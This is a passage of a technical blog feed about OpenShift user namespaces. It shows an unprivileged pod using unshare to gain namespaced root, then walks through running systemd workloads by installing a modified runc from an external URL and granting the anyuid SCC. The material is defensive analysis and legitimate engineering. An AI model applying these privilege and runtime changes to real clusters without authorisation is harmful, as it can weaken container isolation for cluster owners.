<span id="cb1-17"><a href="#cb1-17" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> SETPCAP</span></span>
<span id="cb1-18"><a href="#cb1-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="kw">-</span><span class="at"> NET_BIND_SERVICE</span></span></code></pre></div>
<p>The Pod will run under the <code>restricted</code> SCC. I explicitly drop a
number of default capabilities.</p>
<p>Next I created a project named <code>userns</code>, and a new user <code>me</code> with the <code>edit</code> role:</p>
<pre class="shell"><code>% oc new-project userns
Now using project &quot;userns&quot; on server &quot;https://api.ci-ln-cih2n32-f76d1.origin-ci-int-gce.dev.openshift.com:6443&quot;.

You can add applications to this project with the &#39;new-app&#39; command. For example, try:

    oc new-app rails-postgresql-example

to build a new example application in Ruby. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=k8s.gcr.io/serve_hostname

% oc create user me
user.user.openshift.io/me created

% oc adm policy add-role-to-user edit me
clusterrole.rbac.authorization.k8s.io/edit added: &quot;me&quot;</code></pre>
<p>Operating as <code>me</code> I created the pod:</p>
<pre class="shell"><code>% oc --as me create -f pod-fedora.yaml
pod/fedora created</code></pre>
<p>Soon after, the pod is running. I can see what node it is running
on, and its CRI-O container ID:</p>
<pre class="shell"><code>% oc get -o json pod/fedora \
    | jq &#39;.status.phase,
          .spec.nodeName,
          .status.containerStatuses[0].containerID&#39;
&quot;Running&quot;
&quot;ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr&quot;
&quot;cri-o://d164163951604b7fc9506b3a390ec6a14c76dc6077406fc7b5ffcbf81c406f68&quot;</code></pre>
<p>Next I started a shell in my container. I’ll leave it running for
now, and come back to it later:</p>
<pre class="shell"><code>% oc exec -it pod/fedora /bin/sh
sh-5.1$</code></pre>
<p>In another terminal, I opened a debug shell on the worker node.
Then I used <code>crictl</code> to find out the process ID (<code>pid</code>) of the main
container process.</p>
<pre class="shell"><code>% oc debug node/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr
Starting pod/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.4# chroot /host
sh-4.4# crictl inspect d1641639 | jq .info.pid
18668</code></pre>
<p>Next I used <code>pgrep</code> to find all the processes that share the same
set of namespaces as process <code>18668</code>. In other words, processes
running in the same pod sandbox.</p>
<pre class="shell"><code>sh-4.4# pgrep --ns 18668 \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh</code></pre>
<p>There are two processes, running under an unprivileged UID. The UID
comes from a unique range allocated for the <code>userns</code> project. These
two processes are the main container process (<code>sleep</code>), and the
shell that I executed a few steps ago. As expected.</p>
<p>Now for the fun part. Back to the shell we opened in <code>pod/fedora</code>.
Observe that this shell process has an empty capability set:</p>
<pre class="shell"><code>sh-5.1$ grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000000000000000
CapAmb: 0000000000000000</code></pre>
<p>And yet, using <code>unshare(1)</code> I was able to create a new user
namespace. The <code>-r</code> option says to map <code>root</code> in the new user
namespace to the user that created the namespace. And that is
indeed what happens:</p>
<pre class="shell"><code>sh-5.1$ unshare -U -r
[root@fedora /]# id
uid=0(root) gid=0(root) groups=0(root),65534(nobody)</code></pre>
<p>I confirmed it via the node debug shell. I ran <code>pgrep</code> again, this
time restricting the search to processes in the same <code>pid</code> namespace
as process <code>18668</code>. The <code>--nslist</code> option gives the list of
namespaces to match (all namespaces when not specified).</p>
<pre class="shell"><code>sh-4.4# pgrep --ns 18668 --nslist pid \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh
1000580+   36704 -sh</code></pre>
<p>The new shell has pid <code>36704</code>. Observe that UID <code>0</code> in the
new user namespace maps to UID <code>1000580000</code> on the host:</p>
<pre class="shell"><code>sh-4.4# cat /proc/36704/uid_map
         0 1000580000          1</code></pre>
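<p>Each line of <code>uid_map</code> has three fields: the first UID of the
range inside the namespace, the first UID of the range outside it, and the
length of the range. To make the arithmetic explicit, here is a small Python
sketch that parses the content and translates a UID. The function names are
mine, chosen for illustration.</p>

```python
def parse_uid_map(text):
    """Parse uid_map content into (inside_start, outside_start, length) tuples."""
    ranges = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 3:
            ranges.append(tuple(int(field) for field in fields))
    return ranges


def to_outside_uid(ranges, inside_uid):
    """Translate a UID inside the namespace to the UID outside it.

    Returns None if the UID is not covered by any mapped range.
    """
    for inside_start, outside_start, length in ranges:
        offset = inside_uid - inside_start
        if offset in range(length):
            return outside_start + offset
    return None


# The content of /proc/36704/uid_map shown above.
ranges = parse_uid_map("         0 1000580000          1\n")
print(to_outside_uid(ranges, 0))   # 1000580000
print(to_outside_uid(ranges, 1))   # None: only a single UID is mapped
```

<p>The range has length 1, so <code>root</code> is the only user that exists
in the new namespace. That is consistent with <code>unshare -r</code> mapping
just the creating user.</p>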
<h2 id="discussion">Discussion <a href="#discussion" class="section">§</a></h2>
<p>You can create and use user namespaces inside your containers
without any special support from OpenShift or Kubernetes.
Therefore, the idea of an OpenShift or Kubernetes feature for running
a workload in an isolated user namespace <em>by default</em> does not lead
to an increased risk of container escapes or privilege escalation
related to processes running as uid 0 in a user namespace.</p>
<p>This is not to gloss over the fact that other parts of a “workloads
in user namespaces” feature have to be designed and implemented with
care. Particular aspects include pod admission and selection of the
unprivileged UIDs to map to. But on the question of the security of
the Linux user namespaces feature itself, a first class OpenShift or
Kubernetes feature doesn’t introduce any new risk. Whatever risk
there is, is there right now.</p>
<p>If some critical security issue with user namespaces emerges and you need
an urgent mitigation, the only option is to alter the container
runtime Seccomp policies to block the <code>unshare(2)</code> syscall. This is
an advanced topic, involving changes to node configuration. For
details, see <a href="https://docs.openshift.com/container-platform/4.8/security/seccomp-profiles.html"><em>Configuring seccomp profiles</em></a> in the
official OpenShift documentation.</p>]]></summary>
</entry>
<entry>
    <title>Demo: namespaced systemd workloads on OpenShift</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2021-07-22-openshift-systemd-workload-demo.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2021-07-22-openshift-systemd-workload-demo.html</id>
    <published>2021-07-22T00:00:00Z</published>
    <updated>2021-07-22T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="demo-namespaced-systemd-workloads-on-openshift">Demo: namespaced systemd workloads on OpenShift</h1>
<p>I have spent much of the last year diving deep into OpenShift’s
container runtime. The goal: work out how to run systemd-based
workloads in <em>user namespaces</em> on OpenShift nodes. The exploration
took many twists and turns. But finally, I have achieved the goal.</p>
<p>In this post I recap the journey so far, and
<a href="#demo"><strong>demonstrate</strong></a> what I have achieved. Then I will
summarise the path(s?) forward from here.</p>
<h2 id="the-journey-so-far">The journey so far <a href="#the-journey-so-far" class="section">§</a></h2>
<p>My <a href="2021-07-21-freeipa-on-openshift-update.html">previous post</a>
gives an overview of the FreeIPA on OpenShift project. In
particular, it explains our decision to use a “monolithic”
systemd-based container. That implementation approach exposed
capability gaps in OpenShift and led to a long running series of
investigations. I wrote up the results of these investigations
across several blog posts, summarised here:</p>
<h3 id="openshift-and-user-namespaces"><a href="2020-11-05-openshift-user-namespace.html"><em>OpenShift and user namespaces</em></a> <a href="#openshift-and-user-namespaces" class="section">§</a></h3>
<p>I observed that OpenShift (4.6 at the time) did not isolate
containers in user namespaces. I noted that <a href="https://github.com/kubernetes/enhancements/issues/127">KEP-127</a> proposes
user namespace support for Kubernetes (it is <a href="https://github.com/kubernetes/enhancements/pull/2101">still being worked
on</a>). CRI-O
had also recently <a href="https://github.com/cri-o/cri-o/pull/3944">added
support</a> for user
namespaces via annotations.</p>
<h3 id="user-namespaces-in-openshift-via-cri-o-annotations"><a href="2020-12-01-openshift-crio-userns.html"><em>User namespaces in OpenShift via CRI-O annotations</em></a> <a href="#user-namespaces-in-openshift-via-cri-o-annotations" class="section">§</a></h3>
<p>I tested CRI-O’s annotation-based user namespace support on
OpenShift 4.7 nightlies. I found that the runtime creates a sandbox
with a user namespace and the expected UID mappings. I also found
that it is necessary to override the <code>net.ipv4.ping_group_range</code>
sysctl. Also, the SCC enforcement machinery does not know about
user namespaces and therefore the account that creates the container
requires the <code>anyuid</code> SCC. These deficiencies still exist today.</p>
<h3 id="user-namespace-support-in-openshift-4.7"><a href="2021-03-03-openshift-4.7-user-namespaces.html"><em>User namespace support in OpenShift 4.7</em></a> <a href="#user-namespace-support-in-openshift-4.7" class="section">§</a></h3>
<p>I continued my investigation after the release of OpenShift 4.7.
With the aforementioned caveats, user namespaces work. I also noted
an inconsistent treatment of <code>securityContext</code>: specifying
<code>runAsUser</code> in the <code>PodSpec</code> maps the container’s UID <code>0</code> to host
UID <code>0</code>—a dangerous configuration.</p>
<p>More recently, I noticed that the <code>userns-mode</code> annotation I was
using included <code>map-to-root=true</code>. I now understand that it is this
configuration that causes this mapping behaviour. I no longer
consider it particularly serious. Ideally the SCC enforcement
should learn about user namespaces, and prevent unprivileged users
from creating containers that run as <code>root</code> (or other system
accounts) on the host.</p>
<h3 id="multiple-users-in-user-namespaces-on-openshift"><a href="2021-03-10-openshift-user-namespace-multi-user.html"><em>Multiple users in user namespaces on OpenShift</em></a> <a href="#multiple-users-in-user-namespaces-on-openshift" class="section">§</a></h3>
<p>I verified that workloads that run processes under a variety of user
accounts work as expected in user namespaces. I did not use a
<em>systemd</em>-based workload to verify this.</p>
<h3 id="systemd-containers-on-openshift-with-cgroups-v2"><a href="2021-03-30-openshift-cgroupv2-systemd.html"><em>systemd containers on OpenShift with cgroups v2</em></a> <a href="#systemd-containers-on-openshift-with-cgroups-v2" class="section">§</a></h3>
<p>I observed that systemd-based workloads run successfully in
OpenShift when executed as UID 0 <em>on the host</em>. Such containers can
only be created by accounts granted privileged SCCs (e.g. <code>anyuid</code>).
When running the container under other UIDs, <em>systemd</em> can’t run
because it does not have write permission on the container’s cgroup
directory.</p>
<h3 id="using-runc-to-explore-the-oci-runtime-specification"><a href="2021-05-27-oci-runtime-spec-runc.html"><em>Using <code>runc</code> to explore the OCI Runtime Specification</em></a> <a href="#using-runc-to-explore-the-oci-runtime-specification" class="section">§</a></h3>
<p>I investigated how <code>runc</code> (the OCI runtime used in OpenShift)
operates, and how it creates cgroups. I identified some potential
ways to change the ownership of the container cgroup to the
<em>container’s</em> UID 0.</p>
<h3 id="systemd-cgroups-and-subuid-ranges"><a href="2021-06-09-systemd-cgroups-subuid.html"><em>systemd, cgroups and subuid ranges</em></a> <a href="#systemd-cgroups-and-subuid-ranges" class="section">§</a></h3>
<p>I discovered that the systemd <em>transient unit API</em> (which <code>runc</code>
uses to create container cgroups) allows specifying a different
owner for the new cgroup. Unfortunately, the user must be “known”,
in the form of a <code>passwd</code> entity via NSSwitch. A <a href="https://github.com/systemd/systemd/issues/19781">proposal to relax
this requirement</a>
was provisionally rejected. Other approaches include writing an
NSSwitch module to synthesise <code>passwd</code> entities for subuids, or
modifying <code>runc</code> to <code>chown(2)</code> the container cgroup after systemd
creates it. I decided to experiment with the latter approach.</p>
<h2 id="modifying-runc-to-chown-the-container-cgroup">Modifying <code>runc</code> to <code>chown</code> the container cgroup <a href="#modifying-runc-to-chown-the-container-cgroup" class="section">§</a></h2>
<p>The main challenge in modifying <code>runc</code> was getting my head around
the unfamiliar codebase. The actual operations are straightforward.
There are two main aspects.</p>
<p>The first aspect is to compute the appropriate owner UID for the
cgroup, and pass it to the cgroup manager object. I <a href="2021-06-09-systemd-cgroups-subuid.html#determining-the-uid">described the
algorithm</a> in a previous post. The <code>config.HostRootUID()</code> method
already implements this computation. I was able to reuse it.</p>
<p>The second aspect is to actually <code>chown(2)</code> the relevant cgroup
files and directories. I previously observed systemd’s behaviour
when creating units owned by arbitrary users. systemd <code>chown</code>s the
container’s cgroup directory, and the <code>cgroup.procs</code>,
<code>cgroup.subtree_control</code> and <code>cgroup.threads</code> files within that
directory. <code>runc</code> will do the same. The cgroup manager object
already knows the path to the container cgroup directory. It
changes the owner of the directory, and of the same three files that
<em>systemd</em> changes, to the relevant user.</p>
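<p>As a rough illustration only (the real change is Go code inside
<code>runc</code>), the ownership change can be sketched in shell. The
helper names <code>cgroup_chown_targets</code> and
<code>chown_cgroup</code> are hypothetical. Only the owner is changed;
the group is left alone.</p>
<pre class="shell"><code># Sketch only: mimic the ownership change described above.
# Both function names are hypothetical; runc does this in Go.

cgroup_chown_targets() {
    # Print the cgroup directory itself, then the three files in it.
    dir=$1
    printf '%s\n' "$dir"
    for f in cgroup.procs cgroup.subtree_control cgroup.threads; do
        printf '%s\n' "$dir/$f"
    done
}

chown_cgroup() {
    # $1: host UID that maps to UID 0 in the container
    # $2: path to the container cgroup directory
    uid=$1
    cgroup_chown_targets "$2" | while IFS= read -r path; do
        chown "$uid" "$path"
    done
}</code></pre>
<p>For example, <code>chown_cgroup 200000 /path/to/container/cgroup</code>
(run as <code>root</code>) would hand the directory and the three files to
host UID <code>200000</code>.</p>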
<h2 id="demo">Demo <a href="#demo" class="section">§</a></h2>
<p>Following is a step-by-step demonstration starting with a fresh
deployment of OpenShift <code>4.7.20</code>.</p>
<pre class="shell"><code>% oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.7.20    True        False         8m52s   Cluster version is 4.7.20</code></pre>
<div class="note">
<p>There is a <a href="https://github.com/cri-o/cri-o/issues/5077">regression</a>
in OpenShift 4.8.0 that prevents Pod annotations from being propagated
to container OCI configurations. As a consequence, <code>runc</code> does not
receive the annotations that trigger the experimental behaviour. I
filed a <a href="https://github.com/cri-o/cri-o/pull/5078">pull request</a>
that fixes the issue. The patch was accepted and the fix released
in OpenShift 4.8.4.</p>
</div>
<p>The latent credential is the cluster <code>admin</code> user. Where relevant,
I use the <code>oc --as USER</code> option to execute commands as other users.</p>
<pre class="shell"><code>% oc whoami
system:admin</code></pre>
<h3 id="install-modified-runc-package">Install modified <code>runc</code> package <a href="#install-modified-runc-package" class="section">§</a></h3>
<p>List the nodes in the cluster:</p>
<pre class="shell"><code>% oc get node
NAME                                       STATUS   ROLES    AGE   VERSION
ci-ln-jqbnbfk-f76d1-gnkkv-master-0         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-1         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-2         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-b-dxk6k   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w   Ready    worker   52m   v1.20.0+01c9f3f</code></pre>
<p>For each worker node, open a node debug shell and use <code>rpm-ostree override replace</code> to install the modified <code>runc</code> (one worker shown):</p>
<pre class="shell"><code>% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.2
If you don&#39;t see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree override replace https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading &#39;https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm&#39;... done!
Checking out tree 9767154... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-96.rhaos4.8.gitcd80260.el8 -&gt; 1.0.0-990.rhaos4.8.gitcd80260.el8
Run &quot;systemctl reboot&quot; to start a reboot</code></pre>
<div class="note">
<p>Instead of installing the modified <code>runc</code> on all worker nodes, you
could update one node and use <code>.spec.affinity.nodeAffinity</code> in the <code>PodSpec</code>
to force the pod to run on that node.</p>
</div>
<p>Don’t worry about the restart right now (it will happen in the next
step). Exit the debug shell:</p>
<pre class="shell"><code>sh-4.4# exit
sh-4.2# exit

Removing debug pod ...</code></pre>
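<p>With more than a few workers, the per-node steps above could be
scripted. The following is a sketch, not something I ran as part of
this demo. The helper name <code>replace_runc_on_workers</code> is
hypothetical, and it assumes worker nodes carry the
<code>node-role.kubernetes.io/worker</code> label. The nodes still need
a reboot afterwards, which the next step takes care of.</p>
<pre class="shell"><code># Sketch: apply the package override to every worker node.
# replace_runc_on_workers is a hypothetical helper; $1 is the RPM URL.
replace_runc_on_workers() {
    rpm_url=$1
    # "-o name" prints one "node/NAME" entry per line.
    for node in $(oc get nodes -l node-role.kubernetes.io/worker -o name); do
        # Run the command in the node debug pod instead of an interactive shell.
        oc debug "$node" -- chroot /host rpm-ostree override replace "$rpm_url"
    done
}</code></pre>
<p>Call it with the URL of the package to install, e.g. the
<code>runc</code> RPM URL used in the transcript above.</p>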
<h3 id="enable-user-namespaces-and-cgroups-v2">Enable user namespaces and cgroups v2 <a href="#enable-user-namespaces-and-cgroups-v2" class="section">§</a></h3>
<p>The following <code>MachineConfig</code> enables cgroups v2 and CRI-O
annotation-based user namespace support:</p>
<div class="sourceCode" id="cb6"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> machineconfiguration.openshift.io/v1</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> MachineConfig</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">labels</span><span class="kw">:</span></span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">machineconfiguration.openshift.io/role</span><span class="kw">:</span><span class="at"> worker</span></span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> userns-cgv2</span></span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">kernelArguments</span><span class="kw">:</span></span>
<span id="cb6-9"><a href="#cb6-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> systemd.unified_cgroup_hierarchy=1</span></span>
<span id="cb6-10"><a href="#cb6-10" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> cgroup_no_v1=&quot;all&quot;</span></span>
<span id="cb6-11"><a href="#cb6-11" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> psi=1</span></span>
<span id="cb6-12"><a href="#cb6-12" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">config</span><span class="kw">:</span></span>
<span id="cb6-13"><a href="#cb6-13" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">ignition</span><span class="kw">:</span></span>
<span id="cb6-14"><a href="#cb6-14" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">version</span><span class="kw">:</span><span class="at"> </span><span class="fl">3.1.0</span></span>
<span id="cb6-15"><a href="#cb6-15" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">storage</span><span class="kw">:</span></span>
<span id="cb6-16"><a href="#cb6-16" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">files</span><span class="kw">:</span></span>
<span id="cb6-17"><a href="#cb6-17" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/crio/crio.conf.d/99-crio-userns.conf</span></span>
<span id="cb6-18"><a href="#cb6-18" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb6-19"><a href="#cb6-19" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb6-20"><a href="#cb6-20" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS5ydW50aW1lcy5ydW5jXQphbGxvd2VkX2Fubm90YXRpb25zPVsiaW8ua3ViZXJuZXRlcy5jcmktby51c2VybnMtbW9kZSJdCg==</span></span>
<span id="cb6-21"><a href="#cb6-21" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subuid</span></span>
<span id="cb6-22"><a href="#cb6-22" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb6-23"><a href="#cb6-23" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb6-24"><a href="#cb6-24" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span>
<span id="cb6-25"><a href="#cb6-25" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="kw">-</span><span class="at"> </span><span class="fu">path</span><span class="kw">:</span><span class="at"> /etc/subgid</span></span>
<span id="cb6-26"><a href="#cb6-26" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">overwrite</span><span class="kw">:</span><span class="at"> </span><span class="ch">true</span></span>
<span id="cb6-27"><a href="#cb6-27" aria-hidden="true" tabindex="-1"></a><span class="at">        </span><span class="fu">contents</span><span class="kw">:</span></span>
<span id="cb6-28"><a href="#cb6-28" aria-hidden="true" tabindex="-1"></a><span class="at">          </span><span class="fu">source</span><span class="kw">:</span><span class="at"> data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==</span></span></code></pre></div>
<p>The file <code>/etc/crio/crio.conf.d/99-crio-userns.conf</code> enables CRI-O’s
annotation-based user namespace support. Its content
(base64-encoded in the <code>MachineConfig</code>) is:</p>
<div class="sourceCode" id="cb7"><pre class="sourceCode ini"><code class="sourceCode ini"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="kw">[crio.runtime.runtimes.runc]</span></span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="dt">allowed_annotations</span><span class="ot">=</span><span class="st">[&quot;io.kubernetes.cri-o.userns-mode&quot;]</span></span></code></pre></div>
<p>The <code>MachineConfig</code> also overrides <code>/etc/subuid</code> and <code>/etc/subgid</code>,
defining sub-id ranges for user namespaces. The content is the same
for both files:</p>
<pre><code>core:100000:65536
containers:200000:268435456</code></pre>
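<p>If you change the file contents, the <code>source</code> values in the
<code>MachineConfig</code> have to be regenerated. A minimal sketch,
assuming GNU <code>base64</code> (the <code>-w0</code> option disables line
wrapping); the helper names <code>to_data_url</code> and
<code>from_data_url</code> are hypothetical:</p>
<pre class="shell"><code># Sketch: build the "source" value for a file from its content on stdin.
to_data_url() {
    printf 'data:text/plain;charset=utf-8;base64,%s\n' "$(base64 -w0)"
}

# Reverse direction: recover the file content from a "source" value.
from_data_url() {
    printf '%s' "${1#*base64,}" | base64 -d
}

# Encode the sub-id ranges shown above.
printf 'core:100000:65536\ncontainers:200000:268435456\n' | to_data_url</code></pre>
<p>The final command should print the same value that the
<code>MachineConfig</code> uses for <code>/etc/subuid</code> and
<code>/etc/subgid</code>. Passing that value to <code>from_data_url</code>
gives back the two lines.</p>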
<p>Create the <code>MachineConfig</code>:</p>
<pre class="shell"><code>% oc create -f machineconfig-userns-cgv2.yaml
machineconfig.machineconfiguration.openshift.io/userns-cgv2 created</code></pre>
<p>Wait for the Machine Config Operator to apply the changes and reboot
the worker nodes:</p>
<pre class="shell"><code>% oc wait mcp/worker --for condition=updated --timeout=-1s
machineconfigpool.machineconfiguration.openshift.io/worker condition met</code></pre>
<p>It will take several minutes, as worker nodes get rebooted one at a time.</p>
<h3 id="create-project-and-user">Create project and user <a href="#create-project-and-user" class="section">§</a></h3>
<p>Create a new project called <code>test</code>:</p>
<pre class="shell"><code>% oc new-project test
Now using project &quot;test&quot; on server &quot;https://api.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com:6443&quot;.

You can add applications to this project with the &#39;new-app&#39; command. For example, try:

    oc new-app ruby~https://github.com/sclorg/ruby-ex.git

to build a new example application in Python. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=gcr.io/hello-minikube-zero-install/hello-node</code></pre>
<p>The output shows the public domain name of this cluster:
<code>ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com</code>. We need to know
this for creating the route in the next step.</p>
<p>Create a user called <code>test</code>. Grant it the <code>admin</code> role on project
<code>test</code>, and the <code>anyuid</code> Security Context Constraint (SCC)
privilege:</p>
<pre class="shell"><code>% oc create user test
user.user.openshift.io/test created
% oc adm policy add-role-to-user admin test
clusterrole.rbac.authorization.k8s.io/admin added: &quot;test&quot;
% oc adm policy add-scc-to-user anyuid test
securitycontextconstraints.security.openshift.io/anyuid added to: [&quot;test&quot;]</code></pre>
<h3 id="create-service-and-route">Create service and route <a href="#create-service-and-route" class="section">§</a></h3>
<p>Create a service to provide HTTP access to pods matching the <code>app: nginx</code> selector:</p>
<div class="sourceCode" id="cb13"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb13-1"><a href="#cb13-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb13-2"><a href="#cb13-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
<span id="cb13-3"><a href="#cb13-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb13-4"><a href="#cb13-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb13-5"><a href="#cb13-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb13-6"><a href="#cb13-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">selector</span><span class="kw">:</span></span>
<span id="cb13-7"><a href="#cb13-7" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">app</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb13-8"><a href="#cb13-8" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">ports</span><span class="kw">:</span></span>
<span id="cb13-9"><a href="#cb13-9" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="kw">-</span><span class="at"> </span><span class="fu">protocol</span><span class="kw">:</span><span class="at"> TCP</span></span>
<span id="cb13-10"><a href="#cb13-10" aria-hidden="true" tabindex="-1"></a><span class="at">      </span><span class="fu">port</span><span class="kw">:</span><span class="at"> </span><span class="dv">80</span></span></code></pre></div>
<pre class="shell"><code>% oc create -f service-nginx.yaml
service/nginx created</code></pre>
<p>The following route definition will provide HTTP ingress from
outside the cluster:</p>
<div class="sourceCode" id="cb15"><pre class="sourceCode yaml"><code class="sourceCode yaml"><span id="cb15-1"><a href="#cb15-1" aria-hidden="true" tabindex="-1"></a><span class="fu">apiVersion</span><span class="kw">:</span><span class="at"> v1</span></span>
<span id="cb15-2"><a href="#cb15-2" aria-hidden="true" tabindex="-1"></a><span class="fu">kind</span><span class="kw">:</span><span class="at"> Route</span></span>
<span id="cb15-3"><a href="#cb15-3" aria-hidden="true" tabindex="-1"></a><span class="fu">metadata</span><span class="kw">:</span></span>
<span id="cb15-4"><a href="#cb15-4" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">name</span><span class="kw">:</span><span class="at"> nginx</span></span>
<span id="cb15-5"><a href="#cb15-5" aria-hidden="true" tabindex="-1"></a><span class="fu">spec</span><span class="kw">:</span></span>
<span id="cb15-6"><a href="#cb15-6" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">host</span><span class="kw">:</span><span class="at"> nginx.apps.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com</span></span>
<span id="cb15-7"><a href="#cb15-7" aria-hidden="true" tabindex="-1"></a><span class="at">  </span><span class="fu">to</span><span class="kw">:</span></span>
<span id="cb15-8"><a href="#cb15-8" aria-hidden="true" tabindex="-1"></a><span class="at">    </span><span class="fu">kind</span><span class="kw">:</span><span class="at"> Service</span></span>
